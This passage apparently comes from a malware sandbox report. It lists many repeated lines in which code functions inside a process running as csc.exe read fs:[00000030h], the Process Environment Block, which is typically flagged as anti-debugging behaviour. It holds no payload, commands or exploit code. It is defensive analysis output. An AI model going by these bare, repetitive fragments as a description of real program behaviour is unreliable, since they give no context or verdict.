Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056405A7 mov eax, dword ptr fs:[00000030h]	5_2_056405A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056405A7 mov eax, dword ptr fs:[00000030h]	5_2_056405A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE59C mov eax, dword ptr fs:[00000030h]	5_2_055FE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B758F mov eax, dword ptr fs:[00000030h]	5_2_055B758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B758F mov eax, dword ptr fs:[00000030h]	5_2_055B758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B758F mov eax, dword ptr fs:[00000030h]	5_2_055B758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F4588 mov eax, dword ptr fs:[00000030h]	5_2_055F4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567F5BE mov eax, dword ptr fs:[00000030h]	5_2_0567F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C2582 mov eax, dword ptr fs:[00000030h]	5_2_055C2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C2582 mov ecx, dword ptr fs:[00000030h]	5_2_055C2582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]	5_2_056535BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]	5_2_056535BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]	5_2_056535BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056535BA mov eax, dword ptr fs:[00000030h]	5_2_056535BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EF5B0 mov eax, dword ptr fs:[00000030h]	5_2_055EF5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E45B1 mov eax, dword ptr fs:[00000030h]	5_2_055E45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E45B1 mov eax, dword ptr fs:[00000030h]	5_2_055E45B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564B594 mov eax, dword ptr fs:[00000030h]	5_2_0564B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564B594 mov eax, dword ptr fs:[00000030h]	5_2_0564B594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]	5_2_055E15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]	5_2_055E15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]	5_2_055E15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]	5_2_055E15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E15A9 mov eax, dword ptr fs:[00000030h]	5_2_055E15A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E245A mov eax, dword ptr fs:[00000030h]	5_2_055E245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564C460 mov ecx, dword ptr fs:[00000030h]	5_2_0564C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B645D mov eax, dword ptr fs:[00000030h]	5_2_055B645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0569547F mov eax, dword ptr fs:[00000030h]	5_2_0569547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]	5_2_055CB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]	5_2_055CB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]	5_2_055CB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]	5_2_055CB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]	5_2_055CB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CB440 mov eax, dword ptr fs:[00000030h]	5_2_055CB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE443 mov eax, dword ptr fs:[00000030h]	5_2_055FE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EA470 mov eax, dword ptr fs:[00000030h]	5_2_055EA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EA470 mov eax, dword ptr fs:[00000030h]	5_2_055EA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EA470 mov eax, dword ptr fs:[00000030h]	5_2_055EA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567F453 mov eax, dword ptr fs:[00000030h]	5_2_0567F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]	5_2_055C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]	5_2_055C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]	5_2_055C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]	5_2_055C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1460 mov eax, dword ptr fs:[00000030h]	5_2_055C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]	5_2_055DF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]	5_2_055DF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]	5_2_055DF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]	5_2_055DF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]	5_2_055DF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF460 mov eax, dword ptr fs:[00000030h]	5_2_055DF460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]	5_2_05646420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]	5_2_05646420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]	5_2_05646420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]	5_2_05646420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]	5_2_05646420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]	5_2_05646420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05646420 mov eax, dword ptr fs:[00000030h]	5_2_05646420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E340D mov eax, dword ptr fs:[00000030h]	5_2_055E340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F8402 mov eax, dword ptr fs:[00000030h]	5_2_055F8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F8402 mov eax, dword ptr fs:[00000030h]	5_2_055F8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F8402 mov eax, dword ptr fs:[00000030h]	5_2_055F8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FA430 mov eax, dword ptr fs:[00000030h]	5_2_055FA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05647410 mov eax, dword ptr fs:[00000030h]	5_2_05647410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BE420 mov eax, dword ptr fs:[00000030h]	5_2_055BE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BE420 mov eax, dword ptr fs:[00000030h]	5_2_055BE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BE420 mov eax, dword ptr fs:[00000030h]	5_2_055BE420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BC427 mov eax, dword ptr fs:[00000030h]	5_2_055BC427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056694E0 mov eax, dword ptr fs:[00000030h]	5_2_056694E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056954DB mov eax, dword ptr fs:[00000030h]	5_2_056954DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C04E5 mov ecx, dword ptr fs:[00000030h]	5_2_055C04E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564A4B0 mov eax, dword ptr fs:[00000030h]	5_2_0564A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C9486 mov eax, dword ptr fs:[00000030h]	5_2_055C9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C9486 mov eax, dword ptr fs:[00000030h]	5_2_055C9486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB480 mov eax, dword ptr fs:[00000030h]	5_2_055BB480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F34B0 mov eax, dword ptr fs:[00000030h]	5_2_055F34B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F44B0 mov ecx, dword ptr fs:[00000030h]	5_2_055F44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C64AB mov eax, dword ptr fs:[00000030h]	5_2_055C64AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C0750 mov eax, dword ptr fs:[00000030h]	5_2_055C0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F674D mov esi, dword ptr fs:[00000030h]	5_2_055F674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F674D mov eax, dword ptr fs:[00000030h]	5_2_055F674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F674D mov eax, dword ptr fs:[00000030h]	5_2_055F674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D3740 mov eax, dword ptr fs:[00000030h]	5_2_055D3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D3740 mov eax, dword ptr fs:[00000030h]	5_2_055D3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D3740 mov eax, dword ptr fs:[00000030h]	5_2_055D3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05693749 mov eax, dword ptr fs:[00000030h]	5_2_05693749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C8770 mov eax, dword ptr fs:[00000030h]	5_2_055C8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770 mov eax, dword ptr fs:[00000030h]	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602750 mov eax, dword ptr fs:[00000030h]	5_2_05602750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05602750 mov eax, dword ptr fs:[00000030h]	5_2_05602750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05644755 mov eax, dword ptr fs:[00000030h]	5_2_05644755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564E75D mov eax, dword ptr fs:[00000030h]	5_2_0564E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]	5_2_055BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]	5_2_055BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]	5_2_055BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BB765 mov eax, dword ptr fs:[00000030h]	5_2_055BB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FF71F mov eax, dword ptr fs:[00000030h]	5_2_055FF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FF71F mov eax, dword ptr fs:[00000030h]	5_2_055FF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568972B mov eax, dword ptr fs:[00000030h]	5_2_0568972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567F72E mov eax, dword ptr fs:[00000030h]	5_2_0567F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C0710 mov eax, dword ptr fs:[00000030h]	5_2_055C0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F0710 mov eax, dword ptr fs:[00000030h]	5_2_055F0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563C730 mov eax, dword ptr fs:[00000030h]	5_2_0563C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]	5_2_0569B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]	5_2_0569B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]	5_2_0569B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0569B73C mov eax, dword ptr fs:[00000030h]	5_2_0569B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C5702 mov eax, dword ptr fs:[00000030h]	5_2_055C5702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C5702 mov eax, dword ptr fs:[00000030h]	5_2_055C5702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C7703 mov eax, dword ptr fs:[00000030h]	5_2_055C7703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FC700 mov eax, dword ptr fs:[00000030h]	5_2_055FC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F273C mov eax, dword ptr fs:[00000030h]	5_2_055F273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F273C mov ecx, dword ptr fs:[00000030h]	5_2_055F273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F273C mov eax, dword ptr fs:[00000030h]	5_2_055F273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C973A mov eax, dword ptr fs:[00000030h]	5_2_055C973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C973A mov eax, dword ptr fs:[00000030h]	5_2_055C973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B9730 mov eax, dword ptr fs:[00000030h]	5_2_055B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B9730 mov eax, dword ptr fs:[00000030h]	5_2_055B9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F5734 mov eax, dword ptr fs:[00000030h]	5_2_055F5734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C3720 mov eax, dword ptr fs:[00000030h]	5_2_055C3720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF720 mov eax, dword ptr fs:[00000030h]	5_2_055DF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF720 mov eax, dword ptr fs:[00000030h]	5_2_055DF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DF720 mov eax, dword ptr fs:[00000030h]	5_2_055DF720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FC720 mov eax, dword ptr fs:[00000030h]	5_2_055FC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FC720 mov eax, dword ptr fs:[00000030h]	5_2_055FC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564E7E1 mov eax, dword ptr fs:[00000030h]	5_2_0564E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CC7C0 mov eax, dword ptr fs:[00000030h]	5_2_055CC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C57C0 mov eax, dword ptr fs:[00000030h]	5_2_055C57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C57C0 mov eax, dword ptr fs:[00000030h]	5_2_055C57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C57C0 mov eax, dword ptr fs:[00000030h]	5_2_055C57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C47FB mov eax, dword ptr fs:[00000030h]	5_2_055C47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C47FB mov eax, dword ptr fs:[00000030h]	5_2_055C47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056407C3 mov eax, dword ptr fs:[00000030h]	5_2_056407C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E27ED mov eax, dword ptr fs:[00000030h]	5_2_055E27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E27ED mov eax, dword ptr fs:[00000030h]	5_2_055E27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E27ED mov eax, dword ptr fs:[00000030h]	5_2_055E27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CD7E0 mov ecx, dword ptr fs:[00000030h]	5_2_055CD7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]	5_2_0564F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]	5_2_0564F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]	5_2_0564F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]	5_2_0564F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564F7AF mov eax, dword ptr fs:[00000030h]	5_2_0564F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056497A9 mov eax, dword ptr fs:[00000030h]	5_2_056497A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056937B6 mov eax, dword ptr fs:[00000030h]	5_2_056937B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF7BA mov eax, dword ptr fs:[00000030h]	5_2_055BF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567F78A mov eax, dword ptr fs:[00000030h]	5_2_0567F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055ED7B0 mov eax, dword ptr fs:[00000030h]	5_2_055ED7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C07AF mov eax, dword ptr fs:[00000030h]	5_2_055C07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568866E mov eax, dword ptr fs:[00000030h]	5_2_0568866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568866E mov eax, dword ptr fs:[00000030h]	5_2_0568866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DC640 mov eax, dword ptr fs:[00000030h]	5_2_055DC640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F2674 mov eax, dword ptr fs:[00000030h]	5_2_055F2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FA660 mov eax, dword ptr fs:[00000030h]	5_2_055FA660
